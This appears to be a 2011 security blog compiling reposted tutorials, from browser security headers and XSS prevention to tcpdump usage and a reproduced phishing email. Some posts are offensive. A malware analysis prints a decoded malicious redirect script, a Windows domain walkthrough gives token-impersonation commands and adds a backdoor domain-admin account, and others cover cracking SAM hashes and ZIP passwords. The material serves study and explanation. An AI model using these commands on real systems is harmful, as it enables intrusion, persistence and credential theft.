Apr 2, 2011

Javascript Obfuscation Using Colors?

This article is very interesting for me and I think who invent this is very smart. I cut off some paragraphs of this article. If you want to see full article, please go to the Source.

If this was found on a webpage, you might just overlook it as something benign.
It starts off by defining an array of hexadecimal values which look like a representation of different colors.

new Array(‘#4b8272′,’#81787f’,'#832f83′,’#887f74′,’#4c3183′,’#748783′,’#3e7970′,

The function “div_pick_colors” concatenates them into one long string after ignoring the pound sign. You end up with this:


The same function then grabs two characters at a time and does some fancy footwork to convert it into a malicious redirect.

s += String.fromCharCode(parseInt(c_clr, 16) – 15);

Let’s go through this quickly…
Get the first two characters from the string above (which is “4b”).
Convert it from hexadecimal to decimal (you’ll get “75″).
Subtract 15 from the decimal value (which is “60″).
Now convert the decimal value to ASCII (you’ll end up with “<").
Now do the next one...
Get the second two characters (which is "82").
Convert it from hex to decimal (you'll get "130").
Subtract 15 from the decimal value (which is "115").
Now convert the value to ASCII (you'll end up with "s").
If you continue along, you'll end up with the following redirect code:

<script type="text/javascript" src="http://kusto11.com/js/jquery.min.php">

If you want to cheat, you can insert an alert into the script which will popup the redirect code in one fell swoop.

Source: http://www.kahusecurity.com/2011/javascript-obfuscation-using-colors

yInjector – SQL Injection Penetration Tool

yInjector is a MySQL Injection penetration tool.
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. (Wikipedia)

Main Feature
  • GET and POST request
  • Proxy Support
  • Log Report option avaiable
Exploitation Methods
  • Columns number finder
  • Database dump, SQL Injection must be provided
  • Advanced and Automated Exploitation : finds the SQL Injection to provide a Shell Assistant
Shell Assistant features
  • Multiple data from all DB extraction
  • MySQL Command line (SELECT)
  • md5 hash cracker assistant
  • Remote Command Execution via SQL Injection
Video:  yInjector – SQL Injection Penetration Tool
More Information: http://y-osirys.com/softwares/

Source: http://www.vulnerabilitydatabase.com/2011/03/yinjector-sql-injection-penetration-tool/

Howto: Installation "MITMPROXY"

mitmproxy is an SSL-capable, intercepting HTTP proxy. It provides a console interface that allows traffic flows to be inspected and edited on the fly. (if you want to download it, please see the Source.)

Now I want to install and use it in my Backtrack4. This is installation.
1. Download ssl module for Python and install it.
- wget http://pypi.python.org/packages/source/s/ssl/ssl-1.15.tar.gz
- tar xzvf ssl-1.15.tar.gz
- cd xzvf ssl-1.15
- make
- make install
2. Go to the Python2.5(My python installed version) library ssl path. And deleted __init__.pyc file
- cd /usr/lib/python2.5/site-packages/ssl
- rm __init__.pyc
3. Download and install urwid
- wget http://excess.org/urwid/urwid-
- tar xzvf urwid-
- cd urwid-
- python setup.py install
4. Download and install pry
- wget https://github.com/samtaufa/pry/zipball/master
- tar xzvf cortesi-pry-3f27057.tar.gz
- cd cortesi-pry-3f27057
- python setup.py install
5. Now we're ready to install and use the mitmproxy
- cd mitmproxy
- python setup.py install
- mitmproxy
6. Set the Browser to use this proxy or ARP Spoofing for redirect traffic to this tool(I will create video soon.)

If you want some example or want to download mitmproxy, please go to the Source.
Source: http://mitmproxy.org/

Apr 1, 2011

Enabling Browser Security in Web Applications

HTTPOnly, Secure Flag, Strict Transport Security, X-Frame-Options, Content Security Policy
The vast majority of application security occurs within the application’s code. However, there are a few key security controls that are enabled by the web application dictating security properties to the web browser.

Some of these defensive controls have been around for awhile and others are newly supported in Firefox 4 and other modern browsers.  Mozilla has been rolling out these controls across all of our websites with a high degree of success. 

Benefit: Minimizes impact of cross site scripting vulnerability by preventing JavaScript access to the session cookie.
Limitations: Does not prevent against any other malicious actions from XSS (phishing, malicious redirects, etc)
Example within HTTP Response:
Cookie: sessiondID=kljahsdf123; HTTPOnly;
Additional Reading:

Secure Flag
Benefit: Instructs the browser to never send the cookie over a HTTP request. The cookie can only be sent over HTTPS. This works even if the user manually types in a request for HTTP. The HTTP request will be sent, but the browser will not send any cookies marked as “SECURE”
Limitations: The HTTP Request is still sent and this could be manipulated by a man in the middle to perform convincing phishing attacks (See Strict Transport Security for solution).
Example within HTTP Response:
Cookie: sessiondID=kljahsdf123; SECURE;
Additional Reading:
Note: When setting both HTTPOnly and SECURE flags you will simply have both values for the cookie:
Cookie: sessiondID=kljahsdf123; HTTPOnly; SECURE;

Strict Transport Security
Benefit: Instructs the browser to never send requests to the domain over HTTP. Requests can only be sent over HTTPS.  Think of this as the Secure flag for the entire request. This will protect the user even if they manually type in HTTP into the URL. The browser will upgrade this to HTTPS, assuming the site has previously enabled HSTS, and only the HTTPS request will be sent over the network.
Limitations: Only supported in most recent browser versions; however, support is quickly growing. Even if CSP is only supported by a portion of users it can act as an alerting system via the the report-uri to detect and report CSP violations that could be an attack.
Example within HTTP Response:
Strict-Transport-Security: max-age=60000
Additional Reading:

Benefit: Instructs the browser to disallow framing of a domain or limit framing to only sites of the same domain.  This prevents clickjacking attacks and other malicious framing actions.
Limitations: Not supported in very old browser versions.
Example within HTTP Response:
X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN
Additional Reading:

Content Security Policy (CSP)
Benefit:  CSP provides some amazing benefits. After a website is setup appropriately (no use of inline JavaScript) and a policy has been established, CSP will effectively prevent XSS where attacker controlled data is embedded in the HTML document.  This works since the policy has established what JavaScript code is allowed and any other JavaScript that may make its way into the webpage via user input is flagged by the browser and blocked.
Limitations: Supported in Firefox 4 and plans for support in Chrome.  It is still possible to introduce XSS vulnerabilities by not properly validating and sanitizing JSON content, or by including attacker controlled data in dynamically generated Javascript code.
Example within HTTP Response:
X-Content-Security-Policy: allow ‘self’ *.mydomain.com

Source: http://blog.mozilla.com/webappsec/2011/03/31/enabling-browser-security-in-web-applications/

Mar 30, 2011

Spamming From Gmail Or Not

Now, I receive the mail from "gteamgroup.activation@gmail.com" that was put into my "Inbox" not "Spam"

First he sent email to me
fromGMAIL ACTIVE [#78325374​5] <gteamgroup.activation@gmail.com>
dateWed, Mar 30, 2011 at 10:34 AM
subjectGoogle Customer Care
hide details 10:34 AM (6 minutes ago)

If your Gmail account is still active,reply by saying you are active ..
and the second email is
fromgteamgroup.activation <gteamgroup.activation@gmail.com>
dateWed, Mar 30, 2011 at 10:37 AM
subjectGoogle Customer Care Re: Google Customer Care
hide details 10:37 AM (8 minutes ago)

At Google, we take your privacy and security seriously. Presently we
are having congestion due to the anonymous registration of too many
Gmail accounts so we are shutting down some accounts and your account
was among those to be deleted. We are sending this email to you so
that you can confirm the ownership and let us know if you still want
to continue using this account.

Gmail need you to verify your account details ASAP .

Do you use Gmail with this account ?* Yes No
Do you use orkut with this Google Account ?* Yes No
Do you use Blogger with this Google Account ?* Yes No

Most Importantly The Details below is needed :

* Full Name * :

* Email ID * :

* Password * :

* Year Registered * :

* Country * :

Account Owners who refuse to Participate in the Verification process
after receiving this message will lose his/her Account within 48hours

We apologize for any inconvenience and appreciate your cooperation and
understanding looking forward to hearing from you..

The Google Account Verification Team
I think this is the spam email or hoax email, don't send your information to them.
If someone know what email of support team of Gmail, please tell me I will send this problem to them.

Mar 29, 2011

Howto: Attack in the local of windows domain

I read interesting article about How to attack a windows domain . And I try to explain it with my style. This is what I got from that article.

All results in each step, you can see in the Source.

1. Get the usernames in the local administrators group
    - net localgroup administrators
2. Enumerate the domain admins
    - net group “domain admins” /domain
3. Incognito is a tool for manipulating windows access tokens and now we use it to see the windows token of our target.
    - incognito -h -u local_valsmith -p D0nth3ckm3 list_tokens -u
  • -h is target host and in that article is our target.
  • -u is username to remote host
  • -p is password to remote host
  • -u(last) is used for list tokens of user
(*** If you don't have incognito , you can download it from http://sourceforge.net/projects/incognito/files/incognito/incognito%20v0.1/incognito-v0.1.zip/download )

 4. In step 3, Make we know the "blackhatadmin_valsmith" can impersonation token and now we try to do it for take group admin rights
    - incognito -h -u local_valsmith -p D0nth3ckm3 execute -c “blackhatadmin_valsmith” cmd

 5. Create the new user for keep the hole and add the new user into the "domain admin".
    - net user hacked 0h3ck3d! /add /domain
    - net group “domain admins” hacked /add /domain

Now we got it.

Source:  http://www.coresec.org/2011/03/27/how-to-attack-a-windows-domain/

Verifying the Comodo Hacker's key ("shot explain")

After I read the blog of Errata Security. I want to summary how to verify the Comodo Hacker's key with the short explain.

1. Download the public key of Mozilla.
   $wget https://bugzilla.mozilla.org/attachment.cgi?id=519863

2. Copy the private key from Comodo Hacker: Mozilla Cert Released. that begins with "-----BEGIN RSA PRIVATE KEY-----" and ends with "-----END RSA PRIVATE KEY-----" to private.pem
   $cat "$KEY" > private.pem

3. Extract the public key from the SSL-website of Mozilla.
   $openssl x509 -noout -inform DER -in addons.mozilla.org.cer -pubkey > public.pem

4. Create the simple file and encrypt it with public key
   $cat "testing file" > testing.txt
   $openssl rsautl -encrypt -inkey public.pem -pubin -in testing.txt -out testencrypted

5. Try to decrypt it with private key.
   $openssl rsautl -decrypt -inkey private.pem -in testencrypted -out decrypted.txt

6.  Check the decrypted.txt file if it matchs testing.txt , it will let you know the private.key is real or not.
   $cat decrypted.txt
   $diff testing.txt decrypted.txt
if you want to see the detail or the meaning of each step. Please see the Source.
Source: http://erratasec.blogspot.com/2011/03/verifying-comodo-hackers-key.html

Howto: Solve the problem OpenVPN with Windows7

Everyday, I use openvpn to connect company network. After I upgrade my Windows XP(I have 2 OS,Backtrack4 and Windows XP) to Windows 7, my openvpn gets the problem like this.

ROUTE: route addition failed using CreateIpForwardEntry: One or more arguments are not correct.
Route addition via IPAPI failed

Now, I found how to solve this problem is
1. Install openvpn development version replace the stable version. (http://swupdate.openvpn.net/community/releases/openvpn-2.2-RC2-install.exe)
2. Run it as Administrator and I recommend to change permission of the openvpn-gui-1.0.3.exe("C:\Program Files\OpenVPN\bin\openvpn-gui-1.0.3.exe") to run it as Administrator every times.

Source: http://skriptd.wordpress.com/2007/07/12/openvpn-gui-on-windows-vista/

Message from Comodo Hacker.

Now, game's changed. This post will give you the messages from Comodo Hacker that make the big news create the forge certificate exploit in last week(http://www.comodo.com/Comodo-Fraud-Incident-2011-03-23.html).

All of messages tell you to know how Comodo hacker forge the certificate with hacked Comodo from InstantSSL.it and he just a single hacker not a group of hacker. Another detail of the big news, you can find it from all of messages.

**Update the messages.

1.A message from Comodo Hacker
2.Another proof of Hack from Comodo Hacker
3.Just Another proof from Comodo Hacker
4.Comodo Hacker: Mozilla Cert Released

Mar 28, 2011

Big Name Company (SUN.com and Mysql.com) was hacked with Blind Sql Injection

At the last night(26/03/2011) in Thailand, I found the news from my twitter (sorry, I can't remember who tweet this news to me.) that Mysql.com and Sun.com was hacked with Blind SQL Injection. if you want to see the detail of this Source.


Sun.com (Oracle Sun Microsystems) vulnerable to SQL Injection

MySQL.com (also MySQL France,Italy,Japan,Germany,etc) Full Disclosure (Hacked)

Mar 27, 2011

Howto: Enable WebGL on Firefox 4

WebGL is a Web-based Graphics Library. It extends the capability of the JavaScript programming language to allow it to generate interactive 3D graphics within any compatible web browser.
WebGL is a context of the canvas HTML element that provides a 3D computer graphics API without the use of plug-ins.

1. Install the new library to replaces the old one.
    - apt-get install libosmesa6
2. Execute Firefox4 and  go to about:config page
3. search for webgl.osmesalib
4. Add string as "/usr/lib/libOSMesa.so.6"
5. Restart the Firefox4

Source: http://www.ubuntugeek.com/howto-enable-webgl-on-firefox-4.html

Preventing XSS Attacks

Cross Site Scripting (XSS) attacks are amongst the most common types of attacks against web applications. XSS attacks all fall under the same category however a more detailed look at the techniques employed during XSS operations reveals a multitude of tactics that exploit a variety of attack vectors. A detailed look at XSS attacks can be found in the following article; Cross-Site Scripting attack. This article guides you through the most common and useful XSS prevention mechanisms which are Filtering and Escaping.

Filtering for XSS

All XSS attacks infect your web site via some form of User Input. XSS attack code could come from a simple <FORM> submitted by your users, or could take a more complex route such as a JSON script, XML web service or even an exploited cookie. In all cases the web developer should be aware that the data is coming from an external source and therefore must not be trusted.
The simplest and arguably the easiest form of XSS protection would be to pass all external data through a filter which will remove dangerous keywords, such as the infamous <SCRIPT> tag, JavaScript commands, CSS styles and other dangerous HTML markup (such as those that contain event handlers.)

Escaping from XSS

This is the primary means to disable an XSS attack.
Escaping has been used to construct this article. I have managed to bring many scripts into your browser, but none of these scripts has executed! The technique used to do that is called, escaping, or as the W3C calls it “Character Escaping”.
In HTML you can escape dangerous characters by using the &# sequence followed by the it’s character code.
An escaped < character looks like this: &#60. The > character is escaped like this: &#62. Below is a list of common escape codes for HTML:

" ---> &#34
# ---> &#35
& ---> &#38
' ---> &#39
( ---> &#40
) ---> &#41
/ ---> &#47
; ---> &#59
< ---> &#60
> ---> &#62

Escaping HTML is fairly easy, however in order to properly protect yourself from all XSS attacks you require to escape JavaScript, Cascading Style Sheets, and sometimes XML data.
The two most popular escaping libraries available are the ESAPI provided by OWASP and AntiXSS provided for Microsoft. ESAPI can plug into various technologies such as Java, .NET, PHP, Classic ASP, Cold Fusion, Python, and Haskell. AntiXSS exclusively protects Microsoft technologies and is therefore better suited in an all-Microsoft environment. Both libraries are constantly updated to keep up with the latest hacker techniques and are maintained by industry experts who understand changing tactics and emerging technologies such as HTML5.

When to Escape

Use HTML Escaping when… Untrusted data is inserted in between HTML opening and closing tags. These are standards tags such as <BODY>, <DIV>, <TABLE> etc…
For example:
Use JavaScript Escaping when…
Untrusted data is inserted inside one of your scripts, or in a place where JavaScript can be present. This includes certain attributes such as STYLE and all event handlers such as ONMOUSEOVER and ONLOAD
For example:

Use CSS Escaping when…
Untrusted data is inserted inside your CSS styles. As you saw in the Attack Vectors examples, many CSS styles can be used to smuggle a script into your page.
For example:
Above is a diagram visually representing the internet boundary and where filtering and escaping must happen to ensure XSS protection.

XSS Attacks are a moving target

In this article I attempted to collect as many recommendations and best practices used by security researchers worldwide. This recommendations set out in this article are by no means exhaustive, however they should be a good starting point for your XSS defence endeavours.
Technology is changing, and hacker attacks are getting more sophisticated but by understanding the basics set out in this article you can be prepared to prevent future attack techniques that will most definitely arise.
The first step in defending against XSS attacks is to code your web applications carefully and use the proper escaping mechanisms in the right places. After that comprehensive testing should be performed, ideally using an automated XSS scanner. When updates are made to your web applications, you should scan the affected pages again to ensure that no new vulnerabilities have been exposed.

If you want to see full article, please see the Source.
Source: http://www.acunetix.com/blog/web-security-zone/articles/preventing-xss-attacks/

Cracking Windows XP Passwords

This page is about cracking (recovering) passwords on Windows XP machines, which is a computationally difficult process. If you just need to set a new password (but without need to recover the old one), then this guide is not for you.


The Windows XP passwords are hashed using LM hash and/or NTLM hash. The hashes are stored in c:\windows\system32\config\SAM. The SAM file is encrypted using c:\windows\system32\config\system and is locked when Windows is running. To get the passwords, you need to shutdown Windows, decrypt the SAM file, and then crack the hashes. You can also obtain the hashes using other software that does not require you to turn your computer off. If everything goes well, you'll have the passwords in 15 minutes.
The SKCLONE tool will allow extracting password hashes in PWDUMP format from the live SAM and importing them to other live systems including 64 bit systems, making it a useful tool for migrating local user accounts to 64 bit windows. It does however require you to run the software as the SYSTEM account, since it will try to reach HKLM\SECURITY\SAM in the registry.


  1. You can use the pwdump (or copypwd or skclone) tool to extract the password hashes, and then use ophcrack or other rainbow table sites to decrypt the passwords. If you do not want to use an online service you can download the ophcrack live CD from http://ophcrack.sourceforge.net/, let the machine boot from the CD, press return, lie back and watch the program crack the hashes.
  2. One solution is to use the Windows Password Recovery Tool to crack windows XP password.
  3. More convenient way is windows password reset with USB flash drive.
  4. How to recover Windows password?
  5. Reset local administrator and user passwords on Windows 7 / Vista / XP / 2008 / 2003 / 2000, if you forgot Windows password and can't log into the computer.

Three ways to recover Windows Password

Usually, we can recover Windows admin password in two traditional ways. The first is to change Screen password with another admin account; the second is to recover the previous password with the windows password reset disk that had been created before you forgot the password. Take Windows XP for example,
  • At the Windows XP login prompt when the password is entered incorrectly click the reset button in the login failed window.
  • Insert the password reset diskette into the computer and click Next.
  • If the correct diskette Windows XP will open a window prompting for the new password you wish to use.
However, we often ignore the important of security until we have been locked out of computer. Fortunately, there is still the last way that can unlock your computer without reinstalling - erase Windows password with Windows password reset CD, which can recover admin password for Windows 7/XP/Vista/NT/2000/2003.... Take Windows Password unlocker for example, followings are the steps to create the reset CD

The step is in the Source that's in the last of this post.

Ophcrack demo

The easiest site to use is the online demo for the Ophcrack software tool.
  • Use PWDump or other password extraction tool to extract the passwords from the target computer. (Note: In order to work, it must be run under an Administrator account )
  • Retain only the part with the two hashes and the colon in between:
If your password is not alphanumeric (indicated by 7 dots in part of the password, or if it says "Not found"), then you will have to use one of the following more powerful sites that contain rainbow tables for symbols as well:


  • Use PWDump or other password extraction tool to extract the passwords from the target computer. (Note: In order to work, it must be run under an Administrator account )
  • Edit the password hash to the pwdump format (add the colon-delimited username and ID number fields in the front, and 3 colons at the end):
  • Go to http://plain-text.info/, click "Add Hashes", enter the hashes in the box, select "lm" as the algorithm, complete the CAPTCHA, and click submit
  • They only crack 2 hashes every 15 minutes, so you may have to wait
  • After a few minutes/hours, come back, go to "Search", type in your hash (just the LM part), and see if it is cracked
  • Read their FAQ for more info.


  • Use PWDump or other password extraction tool to extract the passwords from the target computer.
  • Go to http://www.astalavista.com/index.php?app=onlinetools&module=rainbowtables, click the "crack my hash" tab, select type "lm" in the drop-down menu, and enter the LM hash (part before the colon) into the query field, select "LM" for the algorithm, and click the "Search" button.
  • Check the status page occasionally to see if they have been cracked.
  • The result is case-insensitive, so you have to try inputting all variations of upper and lower case to the "NT Calculator". The correct password is the one that matches the NTLM hash (part after the colon).


  • Use PWDump or other password extraction tool to extract the passwords from the target computer.
  • Go to http://www.OnlineHashCrack.com and enter the LM or NTLM hash (part before the colon) into the query field and click the "Search" button.
  • Check the status page occasionally to see if they have been cracked.
  • If the hash is not in their database, the rainbow tables will be used to find it.


  • If the information retrieved from the pwdump consists of an empty first part, then the LM hash is not stored. This either means that the password is blank, in which case it would look like this:
If it says anything different, then they implemented better security and force you to crack the NTLM hash, which is much more difficult and out of the scope of this guide.
  • This only works if the password is 14 characters or shorter
  • If the password in Windows 2000/XP/2003 is longer than 14 characters, it will be shortened to two hashes of length seven characters each
  • An alternative, which uses the same method of comparing known hashes against unknown is called RainbowCrack, available at http://www.antsight.com/zsl/rainbowcrack/ although this program uses Rainbow Tables that can be in excess of 64 Gb; these tables can be obtained at http://rainbowtables.shmoo.com/
  • A comprehensive project of comparing known hashes against an unknown is at http://www.rainbowcrack.com/ however it requires that you submit a Rainbow Table before you can gain access to their server

Defense against attack

Mac OS X 10.3

Mac OS X 10.3 (Panther) also stores shadowed LM+NTLM hashes for each user. They can be cracked in the same way as the hashes for Windows above
  • First find the "generateduid" for the user you want with the command
$ niutil -readprop . /users/<username> generateduid
  • The hashes are stored in the file /var/db/shadow/hash/<generateduid>. The file is 104 characters long, consisting of the 64-character NTLM+LM hashes and the 40-character SHA1 hash. To retrieve the NTLM+LM hashes, you can run this command as an administrator for example
$ sudo cut -c1-64 /var/db/shadow/hash/70902C33-AC79-11DA-AFDF-000A95CD9AF8
  • The hashes are stored in the reverse order as the pwdump format (NTLM first instead of LM first), so you need to switch the 32-character halves and insert a colon between them
  • Then follow the instructions for Windows passwords

Mac OS X 10.4

Mac OS X 10.4 (Tiger) improves the security by only storing LM+NTLM hashes for users who enable Windows Sharing for their account; and when they do enable it, it asks them to enter their password with a warning that their password is stored in a less secure format. However, for those users with Windows Sharing enabled, the above method will still work. The shadow file format is a little different, but the LM+NTLM hashes are still the first 64 characters. If the hashes are not stored, you will get all 0's when you try to retrieve the hashes.

Samba passwords

In older versions of Samba, the password hashes for Samba users were stored in the file /etc/smbpasswd (location may vary, only root has access) and are in similar format to Windows password hashes discussed above. In newer versions of Samba, run the following as root to get the same information:
pdbedit -L -w
If you want to see all tutorial and full article about Cracking Windows XP Password. please go to the Source.
Source: http://en.wikibooks.org/wiki/Reverse_Engineering/Cracking_Windows_XP_Password

Summary Tcpdump command.

Image from securitywizardry.com
Tcpdump is the premier network analysis tool for information security professionals.
When using a tool that displays network traffic a more natural (raw) way the burden of analysis is placed directly on the human rather than the application. This approach cultivates continued and elevated understanding of the TCP/IP suite, and for this reason I strongly advocate using tcpdump instead of other tools whenever possible.
15:31:34.079416 IP (tos 0x0, ttl  64, id 20244, offset 0, flags [DF], proto: 
TCP (6), length: 60) source.35970 > dest.80: S, cksum 0x0ac1 
(correct), 2647022145:2647022145(0) win 5840
0x0000:  4500 003c 4f14 4000 4006 7417 0afb 0257  E..
0x0010:  4815 222a 8c82 0050 9dc6 5a41 0000 0000  H."*...P..ZA....
0x0020:  a002 16d0 0ac1 0000 0204 05b4 0402 080a  ................
0x0030:  14b4 1555 0000 0000 0103 0302            ...U........


The first of these is -n, which requests that names are not resolved, resulting in the IPs themselves always being displayed.
The second is -X, which displays both hex and ascii content within the packet.
The final one is -S, which changes the display of sequence numbers to absolute rather than relative. The idea there is that you can't see wierdness in the sequence numbers if they're being hidden from you. Remember, the advantage of using tcpdump vs. another tool is getting manual interaction with the packets.
It's also important to note that tcpdump only takes the first  96 bytes of data from a packet by default. If you would like to look at more, add the -s number option to the mix, where number is the number of bytes you want to capture. I usually give it 1514 (to get everything) if I use this option. Here's a short list of the options I use most:
  • -i any : Listen on all interfaces just to see if you're seeing any traffic.
  • -n : Don't resolve hostnames.
  • -nn : Don't resolve hostnames or port names.
  • -X : Show the packet's contents in both hex and ASCII.
  • -XX : Same as -X, but also shows the ethernet header.
  • -v, -vv, -vvv : Increase the amount of packet information you get back.
  • -c : Only get x number of packets and then stop.
  • -S : Print absolute sequence numbers.
  • -e : Get the ethernet header as well.
  • -q : Show less protocol information.
  • -E : Decrypt IPSEC traffic by providing an encryption key.
  • -s : Set the snaplength, i.e. the amount of data that is being captured in bytes
  • -c : Only capture x number of packets, e.g. 'tcpdump -c 3'

Some Basic Uses

  1. Basic communication // see the basics without many options
    # tcpdump -nS
  2. Basic communication (very verbose) // see a good amount of traffic, with verbosity and no name help
    # tcpdump -nnvvS
  3. A deeper look at the traffic // adds -X for payload but doesn't grab any more of the packet
    # tcpdump -nnvvXS
  4. Heavy packet viewing // the final "s" increases the snaplength, grabbing the whole packet
    # tcpdump -nnvvXSs 1514
Here's a capture of exactly two (-c2) ICMP packets using some of the options described above. Notice how much we see about each packet.
hermes root # tcpdump -nnvXSs 1514 -c2 icmp
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 1514 
bytes 23:11:10.370321 IP (tos 0x20, ttl  48, id 34859, offset 0, flags 
[none], length: 84) > icmp 64: echo request seq 0

        0x0000:  4520 0054 882b 0000 3001 7cf5 45fe d52b  E..T.+..0.|.E..+
        0x0010:  4815 222a 0800 3530 272a 0000 25ff d744  H."*..50'*..%..D
        0x0020:  ae5e 0500 0809 0a0b 0c0d 0e0f 1011 1213  .^..............
        0x0030:  1415 1617 1819 1a1b 1c1d 1e1f 2021 2223  .............!"#
        0x0040:  2425 2627 2829 2a2b 2c2d 2e2f 3031 3233  $%&'()*+,-./0123
        0x0050:  3435 3637                                4567
23:11:10.370344 IP (tos 0x20, ttl  64, id 35612, offset 0, flags [none], 
length: 84) > icmp 64: echo reply seq 0
        0x0000:  4520 0054 8b1c 0000 4001 6a04 4815 222a  E..T....@.j.H."*
        0x0010:  45fe d52b 0000 3d30 272a 0000 25ff d744  E..+..=0'*..%..D
        0x0020:  ae5e 0500 0809 0a0b 0c0d 0e0f 1011 1213  .^..............
        0x0030:  1415 1617 1819 1a1b 1c1d 1e1f 2021 2223  .............!"#
        0x0040:  2425 2627 2829 2a2b 2c2d 2e2f 3031 3233  $%&'()*+,-./0123
        0x0050:  3435 3637                                4567
2 packets captured
2 packets received by filter
0 packets dropped by kernel
hermes root # 


Expressions allow you to trim out various types of traffic and find exactly what you're looking for. Mastering the expressions and learning to combine them creatively is what makes one truly powerful with tcpdump. There are three main types of expression: type, dir, and proto.
Type options are host, net, and port. Direction is indicated by dir, and there you can have src, dst, src or dst, and src and dst. Here are a few that you should definitely be comfortable with:

  • host // look for traffic based on IP address (also works with hostname if you're not using -n)
    # tcpdump host
  • src, dst // find traffic from only a source or destination (eliminates one side of a host conversation)
    # tcpdump src
    # tcpdump dst
  • net // capture an entire network using CIDR notation
    # tcpdump net
  • proto // works for tcp, udp, and icmp. Note that you don't have to type proto
    # tcpdump icmp
  • port // see only traffic to or from a certain port
    # tcpdump port 3389
  • src, dst port // filter based on the source or destination port
    # tcpdump src port 1025
    # tcpdump dst port 389
  • src/dst, port, protocol // combine all three
    # tcpdump src port 1025 and tcp
    # tcpdump udp and src port 53
You also have the option to filter by a range of ports instead of declaring them individually, and to only see packets that are above or below a certain size.
  • Port Ranges // see traffic to any port in a range
    tcpdump portrange 21-23
  • Packet Size Filter // only see packets below or above a certain size (in bytes)
    tcpdump less 32
    tcpdump greater 128
  • [ You can use the symbols for less than, greater than, and less than or equal / greater than or equal signs as well. ]
    // filtering for size using symbols tcpdump > 32 tcpdump <= 128

Writing to a File

tcpdump allows you to send what you're capturing to a file for later use using the -w option, and then to read it back using the -r option. This is an excellent way to capture raw traffic and then run it through various tools later.
The traffic captured in this way is stored in tcpdump format, which is pretty much universal in the network analysis space. This means it can be read in by all sorts of tools, including Wireshark, Snort, etc.

Capture all Port 80 Traffic to a File

# tcpdump -s 1514 port 80 -w capture_file
Then, at some point in the future, you can then read the traffic back in like so:

Read Captured Traffic back into tcpdump

# tcpdump -r capture_file

More Examples

# TCP traffic from destined for port 3389
tcpdump -nnvvS and src and dst port 3389

# Traffic originating from the 192.168 network headed for the 10 or 172.16 networks
tcpdump -nvX src net and dst net or

# Non-ICMP traffic destined for from the 172.16 network
tcpdump -nvvXSs 1514 dst and src net and not icmp

# Traffic originating from Mars or Pluto that isn't to the SSH port
tcpdump -vv src mars and not dst port 22

As you can see, you can build queries to find just about anything you need. The key is to first figure out precisely what you're looking for and then to build the syntax to isolate that specific type of traffic.


Also keep in mind that when you're building complex queries you might have to group your options using single quotes. Single quotes are used in order to tell tcpdump to ignore certain special characters -- in this case the "( )" brackets. This same technique can be used to group using other expressions such as host, port, net, etc. Take a look at the command below:
# Traffic that's from AND destined for ports 3389 or 22 (incorrect)
tcpdump src and (dst port 3389 or 22)

If you want to see all examples and get full article, please see the Source.
Source: http://danielmiessler.com/study/tcpdump/

SSL Capable NetCat (and more)

You all know what is netcat (written by Hobbit in 1996), how to use it and that it should have been integrated in all UNIX systems a long time ago. netcat lacked some features, and I tried to add them in this Perl version. For example, SSL support, TCP and UDP proxying and IPv4/IPv6 proxying features. This is now done, unless I missed a bug. Now, enjoy.


SSL Capable NetCat 1.05

Usage: scnc [-options] host port

See `perldoc scnc' for full documentation

   -c                use SSL (default to not)
   -a ca.pem         use SSL certificate authority file
   -f cert.pem       use SSL certificate file (PEM format)
   -k cert-key.pem   use SSL private key file (PEM format)
   -6                use IPv6 (default to not)
   -t                do telnet negociation (default to not)
   -e cmd            command to execute
   -l                listen for connections (default to not)
   -p port           use local port number (default to random high)
   -s address        use address for bindings (default to all addresses)
   -u                use UDP socket (default to TCP)
   -v                be verbose (default to not)
   -z                test port for openness
   -w timeout        timeout before closing connection (default to infinite)
   -S program        use program as a send hook
   -R program        use program as a receive hook
   -r host:port           proxy connection to host:port
   -r host:port:ipv6      proxy connection to host:port using IPv6
   -r host:port::ssl      proxy connection to host:port using SSL
   -r host:port:ipv6:ssl  proxy connection to host:port using IPv6 and SSL


Example applications

Securing a connection with a SSL tunnel

You have a server and a client (of course) that you control. You have a service that does not support SSL but you want to establish a SSL connection to avoid a peer being able to read your traffic. The solution is to create a SSL tunnel (like with ssltunnel or stunnel).

  • Server side (scnc will listen on port 10000/TCP using SSL and redirect traffic to localhost port 110/TCP):
prompt$ scnc -vc -a ca.pem -f server.pem -k server-key.pem -p 10000 -r localhost:110
server: SSL listening on: (IPv4)

  • Client side (scnc will listen on localhost port 1110/TCP and redirect traffic to server port 10000/TCP using SSL):
prompt$ scnc -v -s localhost -p 1110 -r server:10000::ssl
server: listening on: (IPv4)
Now, you can use your client side application and use localhost and port 1110/TCP as the server address. All traffic will use SSL to secure your connection.

Test SSL certificates

If you want to test SSL features, you can use the following certificates. WARNING: they have been generated using the ugly Debian "patched" OpenSSL library :)

If you want to see all examples, please go to the Source.
Source: http://gomor.org/bin/view/GomorOrg/SslNetcat

Howto: Crack Password-Protected ZIP Files

This tutorial for Ubuntu or Backtrack users to crack password-protected zip files with wordlists. 

1. Install FCrackZIP packages.
   -  apt-get install fcrackzip
2. Crack it with Dictionary or Brute Force Attack.
   - Brute Force Attack.
  •      fcrackzip -v zipfiles.
   - Dictionary Attack.
  •      fcrackzip -v -D -p /pentest/passwords/wordlists/wordlists zipfiles.
      *** Wordlist is the file that contain a lists of words (one word per line)
      *** My wordlist is /pentest/passwords/wordlists/wordlists
3. That's you crack the file.

First, I see fcrackzip's example at the Source and I try it by myself and make this tutorial.
Source: http://networkedblogs.com/fTzLu#